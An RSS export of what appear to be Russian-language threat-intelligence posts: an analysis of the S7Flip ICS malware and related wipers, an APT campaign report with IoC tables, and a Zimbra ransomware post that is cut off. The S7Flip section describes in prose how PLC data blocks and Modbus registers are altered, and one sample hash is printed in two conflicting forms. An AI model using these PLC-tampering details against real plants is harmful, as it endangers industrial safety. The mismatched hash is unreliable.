<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>ioc &#8211; PT ESC</title>
	<atom:link href="/tag/ioc/feed/index.xml" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description></description>
	<lastBuildDate>Wed, 07 Oct 2026 11:55:56 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1.3</generator>

<image>
	<url>/wp-content/uploads/2026/09/cropped-cropped-large_icon-32x32.png</url>
	<title>ioc &#8211; PT ESC</title>
	<link>/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Этот ваш Siemens&#8230;</title>
		<link>/this-is-siemens/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Tue, 29 Sep 2026 18:38:28 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">/%d1%8d%d1%82%d0%be%d1%82-%d0%b2%d0%b0%d1%88-siemens/</guid>

					<description><![CDATA[Недавно наши коллеги из Центра промышленной экспертизы Позитива обнаружили на MalwareBazaar один любопытный Windows-образец. Вот его SHA-256: e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2 Наше внимание привлекло сообщение от аккаунта, с которого залили данный сэмпл: Хм, ICS-вредонос, причем…]]></description>
										<content:encoded><![CDATA[<p>Недавно наши коллеги из Центра промышленной экспертизы Позитива обнаружили на MalwareBazaar один любопытный Windows-образец. Вот его SHA-256:</p>
<pre><code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code></pre>
<p>Наше внимание привлекло сообщение от аккаунта, с которого залили данный сэмпл:</p>
<figure class="wp-block-image"><img fetchpriority="high" decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-1024x291.jpg" sizes="auto, (max-width: 1024px) 100vw, 1024px" srcset="/wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-1024x291.jpg 1024w, /wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-300x85.jpg 300w, /wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-768x218.jpg 768w, /wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28.jpg 1280w" alt="" width="1024" height="291" /></figure>
<p>Хм, ICS-вредонос, причем уже с готовым названием S7Flip (то есть нам даже не нужно напрягать свою фантазию, чтобы назвать его)? Звучит интересно! Давайте взглянем, что там внутри.</p>
<p>После закрепления в автозапуске под названием <code>aphp.exe</code> сэмпл начинает собирать адреса устройств в локальной сети — это адреса <code>192.168.*.*</code>, <code>10.*.*.*</code> и <code>172.*.*.*</code>, после чего проверяет на них наличие определенных открытых портов, которые широко используются промышленными устройствами:</p>
<ul>
<li><strong>102</strong> — в основном используют контроллеры Siemens для взаимодействия по протоколу S7Comm или S7Comm+.</li>
<li><strong>502</strong> — стандартный порт протокола Modbus TCP; его могут использовать устройства любых производителей.</li>
<li><strong>44818</strong> — в основном используют контроллеры Allen-Bradley (Rockwell) для взаимодействия по протоколу EtherNet/IP (CIP).</li>
</ul>
<p>Подключение к устройствам Allen-Bradley (Rockwell) фактически не работает. Реализация клиента для EtherNet/IP (CIP) отсутствует: ветка переиспользует Siemens-клиент и пытается подключиться по порту 102 как к контроллеру Siemens. С настоящим Allen-Bradley соединение не установится — воздействие на устройства, открывшие только порт 44818, не оказывается вовсе.</p>
<p>Определив нужные устройства, S7Flip подключается к ним и начинает применять один из деструктивных механизмов (или сразу оба).</p>
<h2>Механизм 1: «randomize» значений</h2>
<p>По S7Comm (порт 102): по очереди обходит блоки DB 1–10; для каждого выбирает случайное смещение 0–99, читает оттуда 4-байтовое целое, прибавляет случайное целое число от −10 до +10 и записывает обратно.</p>
<p>По Modbus TCP (порт 502): выбирает 16-битный holding-регистр по случайному адресу 0–99, читает текущее значение, прибавляет случайное целое число от −10 до +10 и записывает обратно.</p>
<h2>Механизм 2: инверсия битов (findAndModifyInputs)</h2>
<p>По S7Comm (порт 102): последовательно проходит первые 100 байтов в блоках DB 1–10: читает байт, меняет его младший бит на противоположный и записывает обратно.</p>
<p>По Modbus TCP (порт 502): последовательно проходит однобитовые ячейки записи (coils — дискретные выводы, команды, флаги) в диапазоне 0–255: читает бит, меняет на противоположный и записывает обратно.</p>
<p>Каждое изменение пишется в <code>logs.csv</code> рядом с исполняемым файлом и содержит пять колонок — время, тег, вендор, старое и новое значение.</p>
<figure class="wp-block-image"><img decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/09/photo_637@29-09-2026_18-38-28.jpg" sizes="auto, (max-width: 539px) 100vw, 539px" srcset="/wp-content/uploads/2026/09/photo_637@29-09-2026_18-38-28.jpg 539w, /wp-content/uploads/2026/09/photo_637@29-09-2026_18-38-28-300x257.jpg 300w" alt="" width="539" height="461" /></figure>
<p>Помимо данного бинаря, мы также нашли еще один:</p>
<pre><code>88717716e54b35682a28d673764975d439a31ee194c85dfc619a15ea93ab1280</code></pre>
<p>По логике работы он ничем не отличается от рассмотренного ранее образца. Главное отличие заключается в том, что библиотека <code>libmodbus</code>, реализующая работу протокола Modbus, в <code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code> динамически слинкована, а в <code>88717716e54b35682a28d673764975d439a31ee194c85dfc619a15ea93ab1280</code> — статически.</p>
<p>В этот же день с этого же аккаунта <code>jeans</code>, помимо <code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code> (название файла — <code>Edge.exe</code>), был залит еще один бинарь:</p>
<pre><code>2c57c1a39933514c63b5a7b585f5948ead04b65e4df96fb595ccda84208c4aa0</code></pre>
<p>При ближайшем рассмотрении он оказался вайпером. При запуске он по-джентльменски спрашивает, не хотите ли вы установить Microsoft Edge:</p>
<figure class="wp-block-image"><img decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28.jpg" sizes="auto, (max-width: 807px) 100vw, 807px" srcset="/wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28.jpg 807w, /wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28-300x58.jpg 300w, /wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28-768x148.jpg 768w" alt="" width="807" height="156" /></figure>
<p>И если вы отказываетесь, то вайпер прекращает свою работу 😅</p>
<p>Но вот если вы соглашаетесь&#8230; то будьте готовы к «непредвиденным обстоятельствам». Вот их список:</p>
<ul>
<li>рекурсивное удаление всего содержимого папки <code>%USERPROFILE%\Desktop</code>;</li>
<li>там же будет создан файл <code>compiled-desktop</code>, который будет содержать ровно <code>1 048 576</code> случайных байт;</li>
<li>ну и, разумеется, файл <code>README.txt</code> с вежливой просьбой перевести биткоины в размере 100 долларов.</li>
</ul>
<p>После всего этого вредонос добавляет себя в автозапуск.</p>
<p>Расшифровка файлов не предусмотрена: содержимое рабочего стола нигде не сохраняется. Это псевдовымогатель-вайпер.</p>
<p>Самое интересное, что в <code>README.txt</code> указан кошелек, на который злоумышленники предлагают переслать деньги: <code>bc1qp6ejw8ptj9l9pkscmlf8fhhkrrjeawgpyjvtq8</code> — это официальный кошелек для донатов проекта <code>Bitcoin.org</code>. Т. е. жулики на самом деле не хотят выкупа? Хм, интересно&#8230; 🤑</p>
<p>Чуть позже <code>jeans</code> залил еще один вариант данного инструмента — <code>f47502628708300840efe2771a3c5e7e9a631205512f0a2ee6382a00a92056e2</code>, причем на этот раз файл называется не <code>Edge.exe</code>, а <code>Edgev5.exe</code>.</p>
<p>Обозначает ли v5 какое-то развитие или дальнейшее улучшение вредоноса? Да, в новой версии автор добавил симметричное шифрование файлов с помощью AES-256-GCM, а также расширил количество папок для шифрования: теперь помимо Desktop шифрованию подлежат Downloads и Documents. Правда, есть один нюанс&#8230; ключ для расшифрования данных находится в файле <code>master_key.dat</code>, да и биткоин-кошелек такой же, как и в более ранней версии вайпера.</p>
<p>По всей видимости, автор вредоноса активно развивает и тестирует свой инструмент. Возможно, в будущем он начнет активно применять его в «боевом» виде.</p>
<h2>А какая связь между S7Flip и вайперами? 🧐</h2>
<p>В ходе чтения данного поста у вас, возможно, возник вопрос: «а как связаны S7Flip и вайпер между собой?» И на самом деле определенные совпадения есть:</p>
<ul>
<li>все бинари были собраны с помощью тулчейна GCC 16.2.0;</li>
<li>timestamp сборки PE-файлов <code>88717716e54b35682a28d673769475d439a31ee194c85dfc619a15ea93ab1280</code> (S7Flip) и <code>2c57c1a39933514c63b5a7b585f5948ead04b65e4df96fb595ccda84208c4aa0</code> (<code>Edge.exe</code>) совпадает с точностью до дня — 2026-09-13;</li>
<li>общий аккаунт, с которого файлы были залиты на MalwareBazaar, — <code>jeans</code>.</li>
</ul>
<p>Достаточно ли этих данных, чтобы утверждать, что S7Flip и вайперы разработаны одним и тем же автором? Нет, определенные сомнения все равно остаются, но некоторая взаимосвязь все же есть.</p>
<h2>IoCs</h2>
<table>
<tbody>
<tr>
<th>SHA-256</th>
<th>Имя</th>
<th style="text-align: center;">PT Fusion</th>
</tr>
<tr>
<td><code>88717716e54b35682a28d673769475d439a31ee194c85dfc619a15ea93ab1280</code></td>
<td>S7Flip</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/c4cb038a-718a-4509-a22a-151d0ebf310a" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
<tr>
<td><code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code></td>
<td>S7Flip</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/3ca9e76f-e2d8-4da7-85ed-4c950bb25d26" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
<tr>
<td><code>2c57c1a39933514c63b5a7b585f5948ead04b65e4df96fb595ccda84208c4aa0</code></td>
<td>Edge.exe (ver 1)</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/ebdd1e1e-02e6-4b42-adf3-d7ca2356cde2" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
<tr>
<td><code>f47502628708300840efe2771a3c5e7e9a631205512f0a2ee6382a00a92056e2</code></td>
<td>Edgev5.exe</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/e50f6bc0-5e19-4ea5-8460-5840e32ec2ec" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
</tbody>
</table>
<p><span class="hashtag">#malware</span> <span class="hashtag">#win</span> <span class="hashtag">#ioc</span><br />
<a href="https://t.me/ptescalator" target="_blank" rel="noopener">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Операция Chewbacca</title>
		<link>/operation-chewbacca/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Tue, 15 Sep 2026 11:43:48 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">/%d0%be%d0%bf%d0%b5%d1%80%d0%b0%d1%86%d0%b8%d1%8f-chewbacca/</guid>

					<description><![CDATA[В конце июня команда PT ESC в ходе расследования инцидентов обнаружила новую группу, нацеленную как минимум на нефтегазовые компании и финансовый сектор. В ходе атак злоумышленники преследуют деструктивные цели, при этом достаточно…]]></description>
										<content:encoded><![CDATA[<p>В конце июня команда PT ESC в ходе расследования инцидентов обнаружила новую группу, нацеленную как минимум на нефтегазовые компании и финансовый сектор.</p>
<p>В ходе атак злоумышленники преследуют деструктивные цели, при этом достаточно долго сохраняют присутствие в скомпрометированной инфраструктуре.</p>
<p>При перемещении в инфраструктуре используются преимущественно <code>WinRM</code> (как правило, в сочетании с <a href="https://github.com/WinRb/winrm-fs/" rel="noopener" target="_blank">WinRb</a>) и <code>SSH</code>.</p>
<p>Для закрепления в инфраструктуре используются в основном серверные машины с большим аптаймом (<code>Windows\Linux</code>), закрепление осуществляется посредством сервисов в обоих случаях. В качестве полезных нагрузок используется широкий набор инструментов:</p>
<ul>
<li>Агенты для фреймворка <a href="https://github.com/Ne0nd0g/merlin" rel="noopener" target="_blank">merlin</a>.</li>
<li>Агент на базе <a href="https://github.com/NHAS/reverse_ssh" rel="noopener" target="_blank">reverse_ssh</a>.</li>
<li>Утилита <code>GoSocks5Proxy</code> на базе <a href="https://github.com/things-go/go-socks5" rel="noopener" target="_blank">go-socks5</a>.</li>
<li><code>ReverseProxy</code> — собственная утилита на Rust.</li>
<li>Бэкдор <code>GoRinet</code>. Использует шифрование конфига с ключом, формируемым на базе физического адреса сетевого адаптера.</li>
</ul>
<p>🐻 Для совершения деструктивных действий используется разнообразное ПО, в том числе по ряду признаков разработанное с использованием ИИ.</p>
<ul>
<li>Вайпер <code>T-Riper</code> для сетевых устройств производства <code>Cisco</code>/<code>Huawei</code> — удаление образов, сброс конфигурации устройства, ребут. Используются в сочетании с bash-скриптами для запуска по удаленным целям.</li>
<li>Кастомный вайпер для удаленного удаления данных <code>QNAP</code>.</li>
<li>Для шифрования данных на машинах под управлением ОС Windows используется комплекс ВПО, состоящий из оркестратора (с возможностью отправки отчета о прогрессе шифрования на удаленный C2). Порождение вайперов осуществляется многопоточно, причем отдельные исполняемые файлы создаются с добавлением «мусора» в оверлей для уклонения от обнаружения. Для автоматизированного распространения по сети используются файлы конфигов с указанием известных кредов ранее скомпрометированных УЗ и целевых подсетей.</li>
</ul>
<p>Также отмечено использование уязвимости <code>CVE-2026-31431</code> (<a href="https://github.com/tgies/copy-fail-c" rel="noopener" target="_blank">CopyFail</a>) для повышения привилегий, кастомного инструмента <code>CredsReseter</code> для сброса паролей УЗ Linux-подобных систем и Windows-скриптов для дампа кредов сторонних сервисов.</p>
<h2>Рекомендации:</h2>
<ul>
<li>Осуществить поиск и мониторинг индикаторов компрометации.</li>
<li>Провести сигнатурное сканирование.</li>
<li>Обновить ОС.</li>
</ul>
<h2>IoCs</h2>
<h4>Файловые индикаторы:</h4>
<table>
<tr>
<th>Name</th>
<th>MD5</th>
<th style="text-align:center">PT Fusion</th>
</tr>
<tr>
<td><code>acgid</code></td>
<td>9f7a688faf61d895a5c1d09084f16436</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/1f43e287-7d1a-45d8-a9ac-3c1bde73f353" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>cf</code></td>
<td>4c5b89504269b1d73ee5b6449559da4b</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/03639742-ad58-416f-9299-640c4c604a95" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>mnworker.exe</code></td>
<td>a6d00278363e4916c4bc6ff6f36dfe6f</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/cc009c93-fafa-4d3c-ac89-da2639210b40" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>NetConfigSvc.exe</code></td>
<td>56fd630da404d4d8c5afd17eb3506b41</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b4c8d275-6f28-4f80-b248-8cddfeaa24ea" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>NetSvcHelper.exe</code></td>
<td>272625644208beab5daa79f676efab9a</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e2c082a5-61e9-4506-bae9-9b2ec1c5d374" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>powerd</code></td>
<td>0def5f0f50482c887a8fa645e1347e8d</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b57e6b4d-46a4-4e41-9c7a-2a58df95885f" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>ProcessMonitor.exe</code></td>
<td>85a9e9de754b99095644726faf6124f7</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9b04a605-b1bf-41a9-8abb-f2268c467dc8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>rinetd</code></td>
<td>fe323f8f6d84464b7a7f35d694c64851</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ee4946ff-05be-4ffd-aa6c-9be8178d5467" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>rinetd</code></td>
<td>3874e14eda06779d777f182c39ac9dfe</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/def73865-f356-4ae8-909f-7f75cc7e8c3e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>rinetd</code></td>
<td>1841b49525e0b3ca1a17556e6af775c7</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ce98287b-092a-4208-867d-138857a40d1c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-acpid</code></td>
<td>fc5a346c6bbec19a8463977e05fa14c2</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/caa88e55-b725-4623-9fc8-42412fceecfc" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-acpid</code></td>
<td>aa59ebd082118ab7c0a0fded580364da</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/4d018ec6-d77d-4ec4-a6f0-c9eeb909efa1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-network-check</code></td>
<td>fe323f8f6d84464b7a7f35d694c64851</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/035f473d-b4f0-42b4-aad0-bd8609e3a4f1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-rinetd</code></td>
<td>cc622348b636e654d68763447cdb4599</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/92ca1443-bbd9-4a57-b9a3-4ed19b9b7fe0" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-rinetd</code></td>
<td>517ae29a0048d9f21d0debe9476b94e5</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/8e32f73f-203a-408f-a66e-123e35003ed4" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-rinetd</code></td>
<td>40c5c2686fbc451386fc296994664fa2</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/833a1f01-ff28-4f92-80c2-f2fd0d7ef11e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-udiskd</code></td>
<td>9dec74a38d9b6e668d616b2ec45159d5</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2204c96f-eaeb-4e10-be93-a9117872e683" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-udiskd</code></td>
<td>0df3c7d1f30e984318cf3a3a98b9d4d2</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/6b597426-c69c-4393-a6c3-991ac50df2a9" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-udiskd</code></td>
<td>005b0b12b59930845fabc6f45c6ca725</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5dc5700c-910a-41ad-afc8-cc33e701e188" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>test</code></td>
<td>85ba7a059f33bf40fb1386fd506b38a7</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/901a17cb-c300-4787-b80c-b90bf10592d7" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>udiskd</code></td>
<td>846ec88090311868d4e19658ef538077</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5174b645-410d-4985-8aa7-4df97aa2d92c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>update</code></td>
<td>4b6526c735279faf3f938e480c75471b</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7ddb51b6-a903-4f7a-b3a7-642c6acaeef6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>w.exe</code></td>
<td>0acd888653dba95628f3f403f3c03295</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9117b8f8-c441-4466-8734-8f53b54a70a3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>watchdog.exe</code></td>
<td>d363776b4adc2f3a513e0637eb7e957f</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/fe0b49cb-092d-43bb-a8f0-c8803b232afe" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>worker.exe</code></td>
<td>b6e904360c346665117dc97a096f8f96</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/dd44a163-c8d7-41da-bf01-492809af4fa6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix_trapper</code></td>
<td>e54147cf021827f5eb9c19f41e561aa3</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/53d7cec5-7436-4132-a986-2b3f28b82959" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix_trapper</code></td>
<td>da1d0a016d5ee5190475fe0a8d69e139</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/f4ecd8b1-f8c5-4e88-a54a-4edd1f15faf2" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix-agent</code></td>
<td>e8cdefcbf2850a233fe6f13f22ec0efb</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7b67039c-1f2c-419f-bc11-0ff9cf1a7a36" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix-trapper</code></td>
<td>860fd8008365a3e61a21328b0c431076</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/910a909d-6635-4704-89b1-270c3845fa35" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix-trapper</code></td>
<td>72fbfee7fabc9be88f263604addb1860</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2595466a-78f9-4893-aa13-b55aec171e40" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>znfs.exe</code></td>
<td>31d4623ef6d7501c48ac2b3f47e3db16</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/6133992e-db1f-4625-891f-5b9bba613c05" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
</table>
<h4>Сетевые индикаторы</h4>
<table>
<tr>
<th>Адрес</th>
<th style="text-align:center">PT Fusion</th>
</tr>
<tr>
<td><code>adv-click-track.online</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/340ebc5f-fbcc-428f-8326-d376176cd547" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>adv-click-track.space</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/60779cde-8139-4c22-87ec-0644482691f8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>cdn.debian-check.space</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ec2009ca-6479-4091-91f7-67fd3ca5fc55" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>check.cert-update.online</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9e305ae2-8a50-4efc-a78d-1f6afac461da" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>dpkg.debian-check.cloud</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/3a06f1b2-9e00-48cb-bc28-973d136abff8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>scrt.vdyke.online</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/fcb62ad0-8212-4361-aacb-947a17ac0fff" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>status.cert-update.space</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/912be00e-8521-45aa-b958-d160b377986e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>195.58.137.115</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e5eb7d34-2df4-41d6-916e-5977ab2897d3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>199.119.136.138</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/384d0b0e-ed0b-44b9-9f60-01dc4f3cd120" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>213.139.205.166</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5d226d28-23ef-4dbf-9be6-1b83794ff478" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>216.146.26.31</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/af843866-7e01-4bbc-ac9e-e3eef7c8c431" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>45.145.171.112</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/6bee73b4-d2bf-4c5b-a915-29e52796e9f1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>45.59.170.247</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e36e99b7-0c72-48b2-9a2b-a1c54a93a1c6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>91.221.191.228</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/126d3776-d330-4fcd-93b0-36774d1fdf02" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>94.124.160.113</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/afadbed6-2ee9-4b30-a114-9d8c8a97f88a" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>94.124.160.12</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/c20b7fda-0f31-4c6a-8477-7b770d62ee93" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
</table>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#ti</span> <span class="hashtag">#malware</span> <span class="hashtag">#apt</span> <span class="hashtag">#ioc</span> <br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Ваш сервер Zimbra под угрозой</title>
		<link>/your-zimbra-server-is-at-risk/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Thu, 10 Sep 2026 16:23:41 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">/%d0%b2%d0%b0%d1%88-%d1%81%d0%b5%d1%80%d0%b2%d0%b5%d1%80-zimbra-%d0%bf%d0%be%d0%b4-%d1%83%d0%b3%d1%80%d0%be%d0%b7%d0%be%d0%b9/</guid>

					<description><![CDATA[Недавно наша команда PT ESC IR столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с использованием уязвимости CVE-2026-73570 и шифровальщика TargetZimbra. По информации из открытых источников аналогичные атаки массово фиксируются на…]]></description>
										<content:encoded><![CDATA[<p>Недавно наша команда PT ESC IR столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с использованием уязвимости <a href="https://nvd.nist.gov/vuln/detail/cve-2026-73570" rel="noopener" target="_blank">CVE-2026-73570</a> и шифровальщика TargetZimbra. По информации из открытых источников аналогичные атаки массово фиксируются на серверах Zimbra с середины августа.</p>
<p><em>Дисклеймер: если вы используете неактуальную версию ПО Zimbra и не обнаружили на своем почтовом сервере приведенных ниже индикаторов компрометации конкретной кампании шифровальщика TargetZimbra, то это не значит, что ваш сервер гарантированно не скомпрометирован. Уязвимость CVE-2026-73570 может использоваться другими злоумышленниками, например, для установки майнеров, а также APT-группировками, нацеленными на компрометацию инфраструктуры всей организации.</p>
<p></em></p>
<blockquote>
